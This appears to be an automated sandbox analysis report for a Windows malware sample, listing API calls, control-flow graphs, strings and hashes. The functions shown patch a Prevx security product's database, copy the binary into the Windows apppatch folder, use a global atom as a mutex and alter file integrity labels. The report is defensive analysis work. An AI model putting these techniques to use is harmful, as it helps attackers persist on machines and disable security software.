                                                                                                                                                                                                              control_flow_graph 293 402680-4026ac CoInitializeEx 294 4026ae-4026b1 293->294 295 4026bf-4026e7 GetModuleFileNameW SysAllocString 293->295 294->295 296 4026b3-4026b9 294->296 297 402869-40286f 295->297 298 4026ed-4026f8 SysAllocString 295->298 296->295 299 4028c4-4028c9 296->299 300 402871-402876 297->300 301 402879-40287e 297->301 302 402853-402861 SysFreeString 298->302 303 4026fe-40271f CoCreateInstance 298->303 300->301 306 402880-402885 301->306 307 402888-40288d 301->307 304 402863-402864 SysFreeString 302->304 305 402866 302->305 308 402725-40272a 303->308 309 402827-40282a 303->309 304->305 305->297 306->307 310 402897-40289c 307->310 311 40288f-402894 307->311 308->309 312 402730-402741 308->312 309->302 313 4028a6-4028ab 310->313 314 40289e-4028a3 310->314 311->310 312->302 318 402747-402758 312->318 316 4028b5-4028b7 313->316 317 4028ad-4028b2 313->317 314->313 319 4028b9-4028bc 316->319 320 4028be CoUninitialize 316->320 317->316 318->302 322 40275e-402768 318->322 319->299 319->320 320->299 323 40276d-40276f 322->323 323->302 324 402775-40277c 323->324 325 402851 324->325 326 402782-402793 324->326 325->302 326->325 328 402799-4027b1 326->328 330 4027b3-4027d3 CoCreateInstance 328->330 331 40282c-40283d 328->331 332 4027d5-4027da 330->332 333 4027dc 330->333 331->325 337 40283f-402843 331->337 332->333 334 4027de-4027e3 332->334 333->334 334->325 336 4027e5-4027f0 334->336 336->325 340 4027f2-402803 336->340 337->325 338 402845-40284e 337->338 338->325 340->325 342 402805-402814 340->342 342->325 344 402816-402825 342->344 344->325
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                              • CoUninitialize.COMBASE ref: 004028BE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                              • String ID: Windows Explorer
                                                                                                                                                                                                              • API String ID: 1140695583-228612681
                                                                                                                                                                                                              • Opcode ID: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                              • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                              Function 00401E00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              • API String ID: 731831024-2333288578
                                                                                                                                                                                                              • Opcode ID: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                              • Instruction ID: 2f4dd94adce221d10feffccf969df1866f37505423b255349c6b180ac4db3a06
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92113CB6A00205ABE710DBE0DE0DFAF7B7CAB84B41F104129BB05F61D0D7749A04C7A9
                                                                                                                                                                                                              Function 00402360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                              • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                              • API String ID: 3225117150-898603304
                                                                                                                                                                                                              • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                              Function 00402A70 Relevance: 52.7, APIs: 23, Strings: 7, Instructions: 223memorylibraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,76A8DB30), ref: 00402AAB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                              • PathFileExistsA.KERNELBASE(?), ref: 00402AE4
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                              • EntryPoint.UAVINOSIQH(00000000), ref: 00402C76
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryEntryExistsExitFindFreeHeaderImageMoveNamePathPointQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                              • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                              • API String ID: 450058505-3112416296
                                                                                                                                                                                                              • Opcode ID: 66aefa0bda43174da8d304fb35afc24c9e162c35573b710bb5f0be43539d63f7
                                                                                                                                                                                                              • Instruction ID: 5ff553944d99263ee06e3162097b0b7c6440a9b95b570a66abc1ee1896f9e821
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66aefa0bda43174da8d304fb35afc24c9e162c35573b710bb5f0be43539d63f7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28716FB15043419BC710EF609E9C96BBBE8BBD8300F44493EF786B72A1DB749944CB99
                                                                                                                                                                                                              Function 004001CA Relevance: 25.0, APIs: 12, Strings: 1, Instructions: 2235fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 171 4001ca-4001e3 173 4001e5-400258 171->173 174 400259 171->174 175 40025a-401011 173->175 174->175 179 401017-40101a 175->179 180 40113c-401141 175->180 179->180 182 401020-401022 179->182 182->180 183 401028-401044 CreateFileA 182->183 184 401139 183->184 185 40104a-401051 call 401e00 183->185 184->180 188 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 185->188 189 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 185->189 188->189 192 40106a-401089 GetSecurityDescriptorSacl 188->192 190 401105 189->190 191 4010f5-401103 SetEndOfFile 189->191 193 401108-401111 190->193 191->190 191->193 194 4010a0-4010a4 LocalFree 192->194 195 40108b-40109a SetNamedSecurityInfoA 192->195 196 401113-401120 GetHandleInformation 193->196 197 40112f-401136 193->197 194->189 195->194 196->197 198 401122-401126 196->198 198->197 199 401128-401129 CloseHandle 198->199 199->197
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                              • Instruction ID: e082a392c3e1c8ea6bcbabec48e58df7c8b9917df2aee0f20a935e5e0ee169a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4518E715093806FE7128B609D18BAA3FB99F47701F1941EBE680FA1E3D27C4D49C769
                                                                                                                                                                                                              Function 00402540 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                              • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                              • API String ID: 606440919-2829233815
                                                                                                                                                                                                              • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9
                                                                                                                                                                                                              Function 004000F1 Relevance: 24.0, APIs: 12, Strings: 1, Instructions: 1300fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 207 4000f1-4001e3 call 4001ca 212 4001e5-400258 207->212 213 400259 207->213 214 40025a-401011 212->214 213->214 218 401017-40101a 214->218 219 40113c-401141 214->219 218->219 221 401020-401022 218->221 221->219 222 401028-401044 CreateFileA 221->222 223 401139 222->223 224 40104a-401051 call 401e00 222->224 223->219 227 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 224->227 228 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 224->228 227->228 231 40106a-401089 GetSecurityDescriptorSacl 227->231 229 401105 228->229 230 4010f5-401103 SetEndOfFile 228->230 232 401108-401111 229->232 230->229 230->232 233 4010a0-4010a4 LocalFree 231->233 234 40108b-40109a SetNamedSecurityInfoA 231->234 235 401113-401120 GetHandleInformation 232->235 236 40112f-401136 232->236 233->228 234->233 235->236 237 401122-401126 235->237 237->236 238 401128-401129 CloseHandle 237->238 238->236
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1027056982-820036962
                                                                                                                                                                                                              • Opcode ID: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                              • Instruction ID: f59e5f2c9003a6e204812eb1f8c7eb33969ee6ba3e941ca0e7e6302637e7b3a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9781346150E3C06FE7138B609C68B963FB49F57700F1A41EBE680EB1E3D26C4849C366
                                                                                                                                                                                                              Function 00401000 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 239 401000-401011 240 401017-40101a 239->240 241 40113c-401141 239->241 240->241 242 401020-401022 240->242 242->241 243 401028-401044 CreateFileA 242->243 244 401139 243->244 245 40104a-401051 call 401e00 243->245 244->241 248 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 245->248 249 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 245->249 248->249 252 40106a-401089 GetSecurityDescriptorSacl 248->252 250 401105 249->250 251 4010f5-401103 SetEndOfFile 249->251 253 401108-401111 250->253 251->250 251->253 254 4010a0-4010a4 LocalFree 252->254 255 40108b-40109a SetNamedSecurityInfoA 252->255 256 401113-401120 GetHandleInformation 253->256 257 40112f-401136 253->257 254->249 255->254 256->257 258 401122-401126 256->258 258->257 259 401128-401129 CloseHandle 258->259 259->257
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
